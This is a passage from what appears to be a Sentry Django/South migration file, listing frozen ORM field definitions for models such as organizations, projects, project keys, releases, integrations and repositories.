'user_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'user_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.groupsubscription': {
'Meta': {'unique_together': "(('group', 'user'),)", 'object_name': 'GroupSubscription'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'subscription_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'subscription_set'", 'to': "orm['sentry.Project']"}),
'reason': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project_id', 'group_id', 'key'),)", 'object_name': 'GroupTagKey'},
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('group_id', 'key', 'value'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'", 'index_together': "(('project_id', 'key', 'value', 'last_seen'),)"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.grouptombstone': {
'Meta': {'object_name': 'GroupTombstone'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'unique': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.identity': {
'Meta': {'unique_together': "(('idp', 'external_id'),)", 'object_name': 'Identity'},
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'idp': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.IdentityProvider']"}),
'scopes': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.identityprovider': {
'Meta': {'unique_together': "(('type', 'organization'),)", 'object_name': 'IdentityProvider'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.integration': {
'Meta': {'unique_together': "(('provider', 'external_id'),)", 'object_name': 'Integration'},
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'metadata': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationIntegration']", 'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectIntegration']", 'to': "orm['sentry.Project']"}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.latestrelease': {
'Meta': {'unique_together': "(('repository_id', 'environment_id'),)", 'object_name': 'LatestRelease'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'deploy_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationavatar': {
'Meta': {'object_name': 'OrganizationAvatar'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'avatar'", 'unique': 'True', 'to': "orm['sentry.Organization']"})
},
'sentry.organizationintegration': {
'Meta': {'unique_together': "(('organization', 'integration'),)", 'object_name': 'OrganizationIntegration'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'default_auth_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'"},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationonboardingtask': {
'Meta': {'unique_together': "(('organization', 'task'),)", 'object_name': 'OrganizationOnboardingTask'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.organizationoption': {
'Meta': {'unique_together': "(('organization', 'key'),)", 'object_name': 'OrganizationOption', 'db_table': "'sentry_organizationoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.processingissue': {
'Meta': {'unique_together': "(('project', 'checksum', 'type'),)", 'object_name': 'ProcessingIssue'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'sentry.project': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'forced_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'teams'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectTeam']", 'to': "orm['sentry.Team']"})
},
'sentry.projectbookmark': {
'Meta': {'unique_together': "(('project_id', 'user'),)", 'object_name': 'ProjectBookmark'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.projectdsymfile': {
'Meta': {'unique_together': "(('project', 'uuid'),)", 'object_name': 'ProjectDSymFile'},
'cpu_name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'sentry.projectintegration': {
'Meta': {'unique_together': "(('project', 'integration'),)", 'object_name': 'ProjectIntegration'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'rate_limit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'rate_limit_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.projectownership': {
'Meta': {'object_name': 'ProjectOwnership'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'fallthrough': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'unique': 'True'}),
'raw': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'schema': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'})
},
'sentry.projectplatform': {
'Meta': {'unique_together': "(('project_id', 'platform'),)", 'object_name': 'ProjectPlatform'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.projectsymcachefile': {
'Meta': {'unique_together': "(('project', 'dsym_file'),)", 'object_name': 'ProjectSymCacheFile'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'dsym_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDSymFile']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectteam': {
'Meta': {'unique_together': "(('project', 'team'),)", 'object_name': 'ProjectTeam'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.pullrequest': {
'Meta': {'unique_together': "(('repository_id', 'key'),)", 'object_name': 'PullRequest', 'db_table': "'sentry_pull_request'", 'index_together': "(('repository_id', 'date_added'),)"},
'author': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.CommitAuthor']", 'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'merge_commit_sha': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'message': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.rawevent': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'RawEvent'},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.release': {
'Meta': {'unique_together': "(('organization', 'version'),)", 'object_name': 'Release'},
'authors': ('sentry.db.models.fields.array.ArrayField', [], {'of': ('django.db.models.fields.TextField', [], {})}),
'commit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_released': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'last_deploy_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'blank': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'releases'", 'symmetrical': 'False', 'through': "orm['sentry.ReleaseProject']", 'to': "orm['sentry.Project']"}),
'ref': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'total_deploys': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'sentry.releasecommit': {
'Meta': {'unique_together': "(('release', 'commit'), ('release', 'order'))", 'object_name': 'ReleaseCommit'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseenvironment': {
'Meta': {'unique_together': "(('organization_id', 'release_id', 'environment_id'),)", 'object_name': 'ReleaseEnvironment', 'db_table': "'sentry_environmentrelease'"},
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.releasefile': {
'Meta': {'unique_together': "(('release', 'ident'),)", 'object_name': 'ReleaseFile'},
'dist': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Distribution']", 'null': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.TextField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseheadcommit': {
'Meta': {'unique_together': "(('repository_id', 'release'),)", 'object_name': 'ReleaseHeadCommit'},
'commit': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Commit']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.releaseproject': {
'Meta': {'unique_together': "(('project', 'release'),)", 'object_name': 'ReleaseProject', 'db_table': "'sentry_release_project'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'new_groups': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.releaseprojectenvironment': {
'Meta': {'unique_together': "(('project', 'release', 'environment'),)", 'object_name': 'ReleaseProjectEnvironment'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'new_issues_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.repository': {
'Meta': {'unique_together': "(('organization_id', 'name'), ('organization_id', 'provider', 'external_id'))", 'object_name': 'Repository'},
'config': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
